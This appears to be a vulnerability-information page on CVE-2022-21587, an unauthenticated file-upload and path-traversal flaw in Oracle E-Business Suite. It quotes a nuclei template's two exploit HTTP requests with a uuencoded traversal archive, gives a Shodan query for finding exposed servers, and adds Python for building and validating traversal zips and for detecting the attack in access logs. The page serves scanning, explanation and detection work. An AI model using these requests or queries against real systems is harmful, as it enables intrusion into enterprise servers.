Vulnerability Information
Vulnerability name: Oracle E-Business Suite Remote Code Execution Vulnerability
Vulnerability ID: CVE-2022-21587
Vulnerability type: Code execution (unauthenticated arbitrary file upload)
Severity: Critical
Description: Oracle E-Business Suite (EBS) is an integrated suite of enterprise applications used by large organisations worldwide for finance, supply-chain and human-resources processing, and it is one of the major ERP platforms. The vulnerability lies in the Upload component of the Oracle Web Applications Desktop Integrator (Web ADI) product: an attacker with plain HTTP access to the web tier can upload and execute code without any credentials and take full control of the affected system.
The technical root cause is insufficient validation of attacker-supplied uploads. As the PoC below shows, the servlet at /OA_HTML/BneOfflineLOVService accepts a uuencoded zip archive when bne:uueupload=true is set, and the PoC relies on the archive entries being written to disk under the names the attacker chose. Decoding the PoC's uuencoded body shows an entry named ../../../../../FMW_Home/Oracle_EBS-app1/applications/forms/forms/taint.jsp, so the contained JSP is dropped into the web tier's forms directory and is then served as /forms/taint.jsp. In other words, this is the classic archive path-traversal (zip-slip) pattern reachable through an endpoint that is missing an authentication check (CWE-306 in the template classification); no memory corruption or bypass of runtime mitigations is involved.
The impact is critical (CVSS 3.1 base score 9.8, AV:N/AC:L/PR:N/UI:N): an attacker can execute arbitrary code, read sensitive data, modify data and fully compromise the host. Because no authentication is required and the exploit is two HTTP requests, it is trivially automated and scanned for at scale, and the template's kev tag reflects that it is listed in CISA's Known Exploited Vulnerabilities catalog. Organisations should apply the fix from Oracle's October 2022 Critical Patch Update (referenced in the template) without delay and check whether their EBS login pages are reachable from the internet, for example with the search query given below.
Vendor: Oracle
Product: Oracle E-Business Suite
Affected versions: 12.2.3 through 12.2.11
Search query (Shodan): http.title:"login" "x-oracle-dms-ecid" 200
Source: https://github.com/projectdiscovery/nuclei-templates/blob/2ec38e7e552e240343537693282608e360ca1e65/http%2Fcves%2F2022%2FCVE-2022-21587.yaml
Type: projectdiscovery/nuclei-templates:github issues
PoC details
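The root cause described above (an archive whose entry names are trusted when it is unpacked) is easiest to see with the archive built and then checked. The Python below is an added example, not code from this page, from Oracle or from the template authors. It builds a constructed zip carrying the same traversal-style entry name that the PoC's uuencoded archive carries (decodable from the begin 644 block in the PoC section), uuencodes it the way the PoC does, decodes it as the server side must, and then compares an unchecked extraction plan with one that rejects entries escaping the destination directory. The staging directory /u01/upload/tmp, the marker string and the is_safe_entry/plan_extraction helpers are assumptions made for illustration; nothing is written to disk.

```python
import binascii
import io
import posixpath
import zipfile

# Constructed inputs (added example). The entry name mirrors the traversal
# path found in the PoC's uuencoded archive; the JSP body is a stand-in.
TRAVERSAL_NAME = "../../../../../FMW_Home/Oracle_EBS-app1/applications/forms/forms/taint.jsp"
JSP_BODY = b'<%\n    out.print("marker-string");\n%>\n'
# Assumed staging directory the upload component would extract into (illustrative).
DEST_ROOT = "/u01/upload/tmp"


def build_zip(entry_name: str, body: bytes) -> bytes:
    """Build an in-memory zip with one entry; zipfile does not sanitise names on write."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(entry_name, body)
    return buf.getvalue()


def uuencode(data: bytes, filename: str, mode: int = 0o644) -> str:
    """Produce a 'begin 644 <name>' block like the one in the PoC (45 bytes per line)."""
    lines = [f"begin {mode:o} {filename}"]
    for i in range(0, len(data), 45):
        chunk = binascii.b2a_uu(data[i:i + 45], backtick=True)
        lines.append(chunk.decode("ascii").rstrip("\n"))
    lines += ["`", "end"]
    return "\n".join(lines) + "\n"


def uudecode(text: str) -> bytes:
    """Decode a uuencoded block; this is what the server must do before unzipping."""
    lines = text.splitlines()
    if not lines or not lines[0].startswith("begin "):
        raise ValueError("not a uuencoded block")
    out = bytearray()
    for line in lines[1:]:
        if line.strip() == "end":
            break
        out += binascii.a2b_uu(line)   # the lone '`' line decodes to zero bytes
    return bytes(out)


def is_safe_entry(dest_root: str, entry_name: str) -> bool:
    """The missing check: reject entries that would resolve outside dest_root."""
    if not entry_name or entry_name.startswith(("/", "\\")):
        return False
    if "\\" in entry_name or "\x00" in entry_name:
        return False
    root = posixpath.normpath(dest_root)
    target = posixpath.normpath(posixpath.join(root, entry_name))
    # After normalisation the root must still be a prefix path of the target.
    return posixpath.commonpath([root, target]) == root


def plan_extraction(zip_bytes: bytes, dest_root: str, validate: bool) -> dict:
    """Map each entry to where it would be written ('REJECTED' if the check blocks it)."""
    plan = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if validate and not is_safe_entry(dest_root, name):
                plan[name] = "REJECTED"
            else:
                plan[name] = posixpath.normpath(posixpath.join(dest_root, name))
    return plan


def demo() -> tuple:
    """Round-trip the constructed payload and return (unchecked plan, checked plan)."""
    archive = build_zip(TRAVERSAL_NAME, JSP_BODY)
    wire = uuencode(archive, "taintedlove.zip")   # what goes into the multipart part
    recovered = uudecode(wire)                     # what the server unpacks
    assert recovered == archive
    return (plan_extraction(recovered, DEST_ROOT, validate=False),
            plan_extraction(recovered, DEST_ROOT, validate=True))


if __name__ == "__main__":
    unchecked, checked = demo()
    print("unchecked:", unchecked)
    print("checked:  ", checked)
```

The unchecked plan resolves the entry to /FMW_Home/Oracle_EBS-app1/applications/forms/forms/taint.jsp, five levels above the staging directory, which is exactly the file the PoC's second request fetches; the checked plan rejects it while still accepting an ordinary relative name such as reports/q3.csv. Normalising the joined path and comparing its common prefix with the root is the check that an archive-extracting upload handler needs regardless of the archive format.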
id: CVE-2022-21587

info:
  name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch,dogasantos
  severity: critical
  description: |
    Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  remediation: |
    Apply the necessary security patches provided by Oracle to mitigate this vulnerability.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
    - https://www.oracle.com/security-alerts/cpuoct2022.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-21587
    - http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html
    - https://github.com/manas3c/CVE-POC
    - https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis?utm_source=rapid7site&utm_medium=referral&utm_campaign=etr_cve-2022-21587
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-21587
    cwe-id: CWE-306
    epss-score: 0.97364
    epss-percentile: 0.99901
    cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: oracle
    product: e-business_suite
    shodan-query: http.title:"login" "x-oracle-dms-ecid" 200
    fofa-query: title="login" "x-oracle-dms-ecid" 200
    google-query: intitle:"login" "x-oracle-dms-ecid" 200
  tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm

http:
  - raw:
      - |
        POST /OA_HTML/BneOfflineLOVService?bne:uueupload=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv

        ------WebKitFormBoundaryZsMro0UsAQYLDZGv
        Content-Disposition: form-data; name="bne:uueupload"

        TRUE
        ------WebKitFormBoundaryZsMro0UsAQYLDZGv
        Content-Disposition: form-data; name="uploadfilename";filename="taintedlove.zip"

        begin 644 taintedlove.zip
        M4$L
        M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V%P<&QI8V%T:6]N<R]F;W)M<R]F
        M;W)M<R]T86EN="YJ<W!C870@/B!T86EN="YJ<W`*/"4*("`@(&]U="YP<FEN
        M="@B,#8Q96$S,#8M-#9E9BTQ,68P+6%D.30M9C-D,3@S8C`V.#EA(BD["B4^
        M"E!+`0(4`Q0``````$1QRUK1ELZ-30```$T```!*``````````````"D@0``
        M```N+B\N+B\N+B\N+B\N+B]&35=?2&]M92]/<F%C;&5?14)3+6%P<
        M;&EC871I;VYS+V9O<FUS+V9O<FUS+W1A:6YT+FIS<%!+!08``````0`!`'@`
        (``"U````````
        `
        end
        ------WebKitFormBoundaryZsMro0UsAQYLDZGv--

      - |
        GET /forms/taint.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - 061ea306-46ef-11f0-ad94-f3d183b0689a

Note: the uuencoded body as reproduced here is not byte-complete. A uuencode data line beginning with M carries 45 bytes in 60 characters, but the first data line above reads only M4$L and the sixth is short as well, so the archive will not decode as printed; take the template from the source link above rather than copying it from this page. The first request uploads the archive through the Web ADI upload servlet, the second fetches the JSP that the traversal entry placed under /forms/, and the matcher looks for the fixed marker string that the JSP prints in the second response.
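For detection, the PoC's two requests leave a recognisable pair in the web tier's access log: a POST to /OA_HTML/BneOfflineLOVService with bne:uueupload=true, followed by a GET for a .jsp under /forms/ from the same client. The Python below is an added example, not part of the template or of this page; it runs that correlation over a handful of constructed Apache-style access-log lines (the client addresses, timestamps, sizes and the 10-minute window are made up). It assumes the web tier logs the query string; the multipart body field is not visible in an access log, so the query parameter is the only request-level signal available at this layer.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Constructed access-log sample (added example; hosts, times and sizes are made up).
SAMPLE_LOG = """\
10.0.0.9 - - [12/Jan/2023:10:14:55 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 2048
10.0.0.5 - - [12/Jan/2023:10:15:01 +0000] "POST /OA_HTML/BneOfflineLOVService?bne:uueupload=true HTTP/1.1" 200 512
10.0.0.5 - - [12/Jan/2023:10:15:02 +0000] "GET /forms/taint.jsp HTTP/1.1" 200 37
10.0.0.7 - - [12/Jan/2023:10:21:00 +0000] "POST /OA_HTML/BneOfflineLOVService?bne%3Auueupload=TRUE HTTP/1.1" 500 0
10.0.0.9 - - [12/Jan/2023:10:22:10 +0000] "GET /forms/frmservlet HTTP/1.1" 200 1200
10.0.0.7 - - [12/Jan/2023:10:45:00 +0000] "GET /forms/taint.jsp HTTP/1.1" 404 0
"""

# Common/combined log format up to the status code; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_PATH = "/OA_HTML/BneOfflineLOVService"
WINDOW = timedelta(minutes=10)   # assumed correlation window between the two stages


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def is_uue_upload(rec):
    """Stage 1 of the PoC: POST to the Web ADI upload servlet with bne:uueupload=true."""
    if rec["method"] != "POST" or rec["path"] != UPLOAD_PATH:
        return False
    params = parse_qs(rec["query"])   # also decodes the percent-encoded bne%3Auueupload form
    return any(v.lower() == "true" for v in params.get("bne:uueupload", []))


def is_forms_jsp_fetch(rec):
    """Stage 2 of the PoC: GET of a JSP under /forms/, where the dropped file is served."""
    return (rec["method"] == "GET" and rec["path"].startswith("/forms/")
            and rec["path"].lower().endswith(".jsp"))


def detect(lines):
    """Return (kind, ip, target, status) alerts; lines are assumed to be in time order."""
    alerts, last_upload = [], {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if is_uue_upload(rec):
            # Any hit on the upload servlet with this flag is worth an alert on its own,
            # whatever the status code, because the request needs no authentication.
            alerts.append(("uue_upload_attempt", rec["ip"], rec["target"], rec["status"]))
            last_upload[rec["ip"]] = rec["ts"]
        elif is_forms_jsp_fetch(rec):
            seen = last_upload.get(rec["ip"])
            if seen is not None and rec["ts"] - seen <= WINDOW:
                alerts.append(("jsp_fetch_after_upload", rec["ip"], rec["target"], rec["status"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

On the sample, 10.0.0.5 produces both an upload alert and a follow-up JSP fetch (the PoC's success path), 10.0.0.7's percent-encoded upload attempt is still caught by parse_qs, and its JSP request 24 minutes later falls outside the window; the ordinary login and frmservlet traffic from 10.0.0.9 raises nothing. In production the second stage should also be keyed on any newly created .jsp under the web tier, since an attacker is free to choose a different file name than taint.jsp.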